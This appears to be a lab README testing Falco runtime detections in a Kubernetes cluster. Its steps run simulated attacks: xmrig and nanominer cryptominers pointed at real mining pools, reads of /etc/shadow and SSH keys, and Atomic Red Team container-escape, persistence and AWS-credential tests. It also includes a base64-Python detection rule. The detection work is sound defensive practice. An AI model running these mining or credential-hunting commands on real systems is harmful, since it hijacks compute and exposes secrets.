./xmrig --donate-level 8 -o xmr-us-east1.nanopool.org:14433 -u 422skia35WvF9mVq9Z9oCMRtoEunYQ5kHPvRqpH1rGCv1BzD5dUY4cD8wiCMp4KQEYLAN1BuawbUEJE99SNrTv9N9gf2TWC --tls --coin monero
![Screenshot 2023-10-27 at 12 05 51](https://private-user-images.githubusercontent.com/126002808/278623813-b7d9123b-f589-4bd3-9e55-1274236c3c9e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjIzODEzLWI3ZDkxMjNiLWY1ODktNGJkMy05ZTU1LTEyNzQyMzZjM2M5ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kYTY5NjE3NjA2ZjhmNTlkNGIyNmM0YTdlMGEyOTNkNTUwYWZlYTZhZjQ2NWI2MzkyMzY4YTY1MzRkNTA4YWUxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.VyUEbFU5tYMkwo2zDK1Ka2sn9JzYIujgw0jDNdAQbTo)
On the right side pane, we can see that all rules are automatically labelled with relevant MITRE ATT&CK context:
![Screenshot 2023-10-27 at 12 06 03](https://private-user-images.githubusercontent.com/126002808/278624008-392e58ea-357a-44ad-a37c-8b7bb783baec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjI0MDA4LTM5MmU1OGVhLTM1N2EtNDRhZC1hMzdjLThiN2JiNzgzYmFlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00ZWNkNWIyOWRiOGUxZGZhYWQ5NzRmNjFiMWYyYTRjNzY0OWI5MzM5MDZmYzhiYWNhN2U5YzkwZGQxYzJiZDkzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.P4uBOaYXprsiJGIuJuylSCVHFRmBXHe_R0dtlsRVrDA)
After enabling the mining ports and pools rule within my mitre_rules.yaml file, I can see the new domain detection for mining pool:
![Screenshot 2023-11-17 at 11 50 08](https://private-user-images.githubusercontent.com/126002808/283791054-996f70f8-9dcd-46e8-ae76-7b45df443151.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgzNzkxMDU0LTk5NmY3MGY4LTlkY2QtNDZlOC1hZTc2LTdiNDVkZjQ0MzE1MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hYzM4ZDgzZjNiMzVhNzg0NzY4YTY4YWNmOWE5ZjNlYWRhNDQ0N2QzZDZiZmU2ZGE2NDQyMjAzMzEzNjVlMDI5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.z-xItHSY85muZJFVBL4mFtbtizaYC_A74mvjAAWXVgQ)
Testing my own MetaMask wallet using the stratum
protocol outlined by the Trend Micro researchers:
./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -t 2
![Screenshot 2023-10-31 at 19 53 07](https://private-user-images.githubusercontent.com/126002808/279499358-dad4022c-aa60-45f1-801b-ce1a6adcd47a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NDk5MzU4LWRhZDQwMjJjLWFhNjAtNDVmMS04MDFiLWNlMWE2YWRjZDQ3YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02ZTIyZDFmN2FiMDY3ZjI4MGZmYmI5NmVhNDgzYWU0ODQ2MDcxZDljNDE0MDI4NDNjYjg2OTAwOTcwOTBiNTk1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.bVRGzxBNyHVqbUd9M3roY0qXdBGlTpxO-pV1PZMDEaY)
Some rules are specifically disabled within the sandbox manifest file, so we need to enable these separately
![Screenshot 2023-10-31 at 20 03 19](https://private-user-images.githubusercontent.com/126002808/279502315-feb29583-82e2-443d-be5d-fa9000b6290b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NTAyMzE1LWZlYjI5NTgzLTgyZTItNDQzZC1iZTVkLWZhOTAwMGI2MjkwYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lMDFhZWFiMDgwZmEwZmE0NGQ5YjUyODg1YTBiM2JiOWU1NjJmMDdkZDU3OWM2ODY2NzliMjkwMzE4YmM4ODg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.GqCVWLuoiE2piAHVPTRn3yeXDIIzssWL8gDOqNhhICk)
Maturity rules are coming through, but I need to make some changes either to the ConfigMap or within the custom rules config file:
![Screenshot 2023-11-01 at 11 28 04](https://private-user-images.githubusercontent.com/126002808/279661021-c360aba5-d580-4c2f-893a-fe9c11fde6d0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NjYxMDIxLWMzNjBhYmE1LWQ1ODAtNGMyZi04OTNhLWZlOWMxMWZkZTZkMC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNjcxYmMzNmRlYTBiZjc0OGU3NzExNjI3YmMzNDYwZmJhMmQ2MzQzZDY5YjY2NDhiNzEwODhhZmZkNDc0YjM0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.mKFPsYIZDqKXaPmRCz_WgFEjChpakWbYij3Bj5tY5ic)
Make sure the xmrig process is no longer running
top
If so, find the Process ID
of the xmrig service:
pidof xmrig
You can now either kill the process by Process Name
or Process ID
killall -9 xmrig
wget https://github.com/nanopool/nanominer/releases/download/v1.4.0/nanominer-linux-1.4.0.tar.gz
tar -xvzf ./nanominer-linux-1.4.0.tar.gz
cd nanominer-linux-1.4.0/
nano config.ini
./nanominer -d
Finding credentials while we are in the container:
cat /etc/shadow > /dev/null
find /root -name "id_rsa"
This is where an attacker would use a Base64 script to evade traditional file-based detection systems
Shell into the newly-deployed atomic-red workload:
kubectl exec -it -n atomic-red deploy/atomicred -- bash
Confirm the atomic red scenario was detected (in a second terminal window):
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'Bulk data has been removed from disk'
Adversaries may delete files left behind by the actions of their intrusion activity.
Start a Powershell session with pwsh
:
pwsh
Atomic Red Tests are all performed via Powershell
So it might look a bit weird that I shell into a Linux container in order to perform Pwsh actions.
![Screenshot 2023-10-29 at 11 55 01](https://private-user-images.githubusercontent.com/126002808/278868893-219f7436-7f84-4e1d-ad98-0a5ad5d5ff18.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4ODY4ODkzLTIxOWY3NDM2LTdmODQtNGUxZC1hZDk4LTBhNWFkNWQ1ZmYxOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hYjJjZmIwYTAxMzhlNTY4YmNkZjg4NTMxNzlhMjIzODg2YTA3NzBiNjBmMGMyN2E3NjY1YWMxNDFhNWVlNzI0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oIiaMAj7QsDghe8Z4ztQUFFAGACO6TibvZbt9L96IyY)
Load the Atomic Red Team module:
Import-Module "~/AtomicRedTeam/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1" -Force
Check the details of the TTPs:
Invoke-AtomicTest T1070.004 -ShowDetails
Check the prerequisites to ensure the test conditions are right:
Invoke-AtomicTest T1070.004 -GetPreReqs
We will now execute the test.
This test will attempt to delete individual files, or individual directories.
This triggers the Warning bulk data removed from disk
rule by default.
Invoke-AtomicTest T1070.004
I successfully detected file deletion in the Kubernetes environment:
![Screenshot 2023-10-29 at 11 58 42](https://private-user-images.githubusercontent.com/126002808/278869026-076c4a75-f6a8-4b01-81e4-3adf06532f84.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4ODY5MDI2LTA3NmM0YTc1LWY2YTgtNGIwMS04MWU0LTNhZGYwNjUzMmY4NC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iZGRhMWZmY2I3MDE5ZDIxMGYwMzcyOWQ4Yzc1NmQ2NjIyZThkNzI0ZWNmNTk4ODVhZGJmY2Y5ZDk1ZTAzN2QxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.t79bLEj-fMRvV61BqQ80CHgxIz0KIbQt35--UuYAY2Y)
Adversaries may break out of a container to gain access to the underlying host.
This can allow an adversary access to other containerised resources from the host-level.
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep Network tool launched in container
Invoke-AtomicTest T1611
Adversaries can establish persistence by modifying RC scripts which are executed during system startup
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep Potentially malicious Python script
Invoke-AtomicTest T1037.004
The new detection totally worked. Hurrah
!!
When you’re ready to move on to the next test or wrap things up, you’ll want to -CleanUp
the test to avoid potentially having problems running other tests.
Invoke-AtomicTest T1037.004 -CleanUp
Shell into the same container we used earlier
kubectl exec -it tesla-app -- bash
Installing a suspicious networking tool like telnet
yum install telnet telnet-server -y
If this fails, just apply a few modifications to the registry management:
cd /etc/yum.repos.d/
sed -i 's/mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-*
sed -i 's|#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-*
Update the yum registry manager:
yum update -y
Now, try to install telnet and telnet server from the registry manager:
yum install telnet telnet-server -y
Just to generate the detection, run telnet:
telnet
![Screenshot 2023-11-14 at 21 16 33](https://private-user-images.githubusercontent.com/126002808/282940914-a008ab2c-224b-4b00-9500-62f4e460bcb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyOTQwOTE0LWEwMDhhYjJjLTIyNGItNGIwMC05NTAwLTYyZjRlNDYwYmNiNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jYjA3MDkxZWZkY2QyOWU3NTBjMmFiMmUzM2M0ZThmZDVlNTYyNWEwYmI5OWZlYmU5OWY4MjZiYTIzNDUwOGVmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.3SbpuhYG9WUBe_mtoGODJc6M_3OpdelPaJPX5SEDK-4)
![Screenshot 2023-11-14 at 21 16 56](https://private-user-images.githubusercontent.com/126002808/282940934-739a9d27-a76d-47cd-b7bc-4a20a6845adc.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyOTQwOTM0LTczOWE5ZDI3LWE3NmQtNDdjZC1iN2JjLTRhMjBhNjg0NWFkYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZTBjNTU5OTJjMDFlODBhY2M0MTYzOWU2NDMxNjI1YjA3YjlkMjFhM2MzM2RiMmU5M2NlOGQ2ZTkzZWFjYzA5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.-wXU509YNJRubg-s5RyiGvVeXDbvLBARiW642nES29M)
![Screenshot 2023-11-14 at 21 15 59](https://private-user-images.githubusercontent.com/126002808/282940964-af3e220c-aad9-43d6-ab7b-47ed391a2706.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyOTQwOTY0LWFmM2UyMjBjLWFhZDktNDNkNi1hYjdiLTQ3ZWQzOTFhMjcwNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yOGExOGVkMzhjNjEwNzJiODE0YTY0MTZkNGVmM2QyOTRhMGVjOGE3NDFhOGFkMWU4NjIxZDlhOTgwNWQwZTAyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.3MbxTxQpkKuRGSc9WMvsgiUYgrBzlb4oP5jk3GvL_Pg)
Let's also test tcpdump to prove the macro is working:
yum install tcpdump -y
tcpdump -D
tcpdump --version
tcpdump -nnSX port 443
Copy Files From Pod to Local System.
We have a nginx web server running inside a container.
Let’s copy the index.html file
(which nginx serves by default) inside the /usr/share/nginx/html
directory to our local system. Run the following command:
kubectl cp tesla-app:xmrig-6.16.4-linux-static-x64.tar.gz ~/desktop/xmrig-6.16.4-linux-static-x64.tar.gz
![Screenshot 2023-11-01 at 11 33 23](https://private-user-images.githubusercontent.com/126002808/279661850-44642a1d-a970-496b-ab17-6afa28ce540d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NjYxODUwLTQ0NjQyYTFkLWE5NzAtNDk2Yi1hYjE3LTZhZmEyOGNlNTQwZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDc3OGFjOTg3N2FiZTc4NjQ3MGUwMTM2MDE2MWVlNmJkNjFlMDNkZTkxOTI4NDllZGQ4Y2JlMDcxMzkzYmU4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.5dGlfmMm2Z4tP3APMIBcU1_t6tw0RBuMiMVXn1ziDYA)
We can use Atomic Red team to Find AWS credentials
in order to move laterally to the cloud
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md#atomic-test-1---find-aws-credentials
Invoke-AtomicTest T1552.001 -ShowDetails
![Screenshot 2023-11-13 at 21 27 36](https://private-user-images.githubusercontent.com/126002808/282599221-3f444b76-3914-4133-b1aa-9da50f556061.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyNTk5MjIxLTNmNDQ0Yjc2LTM5MTQtNDEzMy1iMWFhLTlkYTUwZjU1NjA2MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iYTFkYmU3NWRhODliZTdjZGE1NmRjZjBlMDFiOWQ3YTU0ZWY1YmYwYWY2YWU2NGQ5YWViNTdiNzEwM2I1YWYxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.mwFN4l_oFbvhnL28SVSKE6FKM4baEMjbNP4iZJ5z6KE)
helm uninstall falco -n falco
![Screenshot 2023-10-27 at 14 43 45](https://private-user-images.githubusercontent.com/126002808/278661126-6e579d96-f21c-4547-a8e6-14b60b338e41.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjYxMTI2LTZlNTc5ZDk2LWYyMWMtNDU0Ny1hOGU2LTE0YjYwYjMzOGU0MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03ZjJhYjMzZDI4MzhlYzZmMThlYjA0YmQ5NDliYWEwOWZmNWVmOWI3Yjc3YjlmYTBmMTUzMGFkYTUwYWFiODAzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.V2iBZEBjQ1mzPPf5pgn0SyLd1zhLL8RPpYLkgKMvBw0)
aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster
![Screenshot 2023-10-22 at 19 53 37](https://private-user-images.githubusercontent.com/126002808/277186313-4fa455c7-a17d-4f0f-934a-02b0827add9c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTg2MzEzLTRmYTQ1NWM3LWExN2QtNGYwZi05MzRhLTAyYjA4MjdhZGQ5Yy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01YmFjZTA5NmFlN2IyZjZhNzdkZDc0OTdmM2Q4M2YyODk2YTYwM2U4NGU4NjE1NTI1ZmZhZDlmYTExM2Q2NmQxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.AQN6XF-8tZ_UMCcWJT9iN4N3DeevlNdCIpMVLr0jUcs)
Confirming the detection rules are present in the current, up-to-date rules feed:
https://thomas.labarussias.fr/falco-rules-explorer/?source=okta
Exposing Falco Sidekick from my EC2 instance:
sudo ssh -i "falco-okta.pem" -L 2802:localhost:2802 ubuntu@ec2-**-***-**-***.eu-west-1.compute.amazonaws.com
Accessing the Sidekick UI via Localhost
http://localhost:2802/events/?since=15min&filter=mitre
Create the network namespace for the atomic red workload
kubectl create ns atomic-red
Create the deployment using an external image issif/atomic-red:latest
kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
name: atomicred
namespace: atomic-red
labels:
app: atomicred
spec:
replicas: 1
selector:
matchLabels:
app: atomicred
template:
metadata:
labels:
app: atomicred
spec:
containers:
- name: atomicred
image: issif/atomic-red:latest
imagePullPolicy: "IfNotPresent"
command: ["sleep", "3560d"]
securityContext:
privileged: true
nodeSelector:
kubernetes.io/os: linux
EOF
Note: This creates a pod called atomicred
in the atomic-red
network namespace:
kubectl get pods -n atomic-red -w | grep atomicred
I successfully deployed the atomic-red
container to my environment:
Use Vim
to create our custom rules:
vi mitre_rules.yaml
customRules:
mitre_rules.yaml: |-
- rule: Base64-encoded Python Script Execution
desc: >
This rule detects base64-encoded Python scripts on command line arguments.
Base64 can be used to encode binary data for transfer to ASCII-only command
lines. Attackers can leverage this technique in various exploits to load
shellcode and evade detection.
condition: >
spawned_process and (
((proc.cmdline contains "python -c" or proc.cmdline contains "python3 -c" or proc.cmdline contains "python2 -c") and
(proc.cmdline contains "echo" or proc.cmdline icontains "base64"))
or
((proc.cmdline contains "import" and proc.cmdline contains "base64" and proc.cmdline contains "decode"))
)
output: >
Potentially malicious Python script encoded on command line
(proc.cmdline=%proc.cmdline user.name=%user.name proc.name=%proc.name
proc.pname=%proc.pname evt.type=%evt.type gparent=%proc.aname[2]
ggparent=%proc.aname[3] gggparent=%proc.aname[4] evt.res=%evt.res
proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid
proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath
user.uid=%user.uid user.loginuid=%user.loginuid
user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name
image=%container.image.repository:%container.image.tag
container.id=%container.id container.name=%container.name file=%fd.name)
priority: warning
tags:
- ATOMIC_RED_T1037.004
- MITRE_TA0005_defense_evasion
- MITRE_T1027_obfuscated_files_and_information
source: syscall
append: false
exceptions:
- name: proc_cmdlines
comps:
- startswith
fields:
- proc.cmdline
I'm lazy, so I uninstall and reinstall charts rathert than upgrading:
helm uninstall falco -n falco
Alternative way of testing the new mitre_rules.yaml
file:
helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
--create-namespace \
--set tty=true \
--set auditLog.enabled=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set collectors.kubernetes.enabled=true \
--set falcosidekick.webui.redis.storageEnabled=false
Let's delete the Falco pod to ensure the changes have been enforced.
kubectl delete pod -l app.kubernetes.io/name=falco -n falco
Note: A new pod after several seconds. Please be patient.
kubectl get pods -n falco -w
Issues with the environment (Making Number of VPCs was reached) - disregard:
Add kubernetes-dashboard repository
helm repo add kubernetes-dashboard https://kubernetes.github.io/dashboard/
Deploy a Helm Release named kubernetes-dashboard
using the kubernetes-dashboard chart
helm upgrade --install kubernetes-dashboard kubernetes-dashboard/kubernetes-dashboard --create-namespace --namespace kubernetes-dashboard
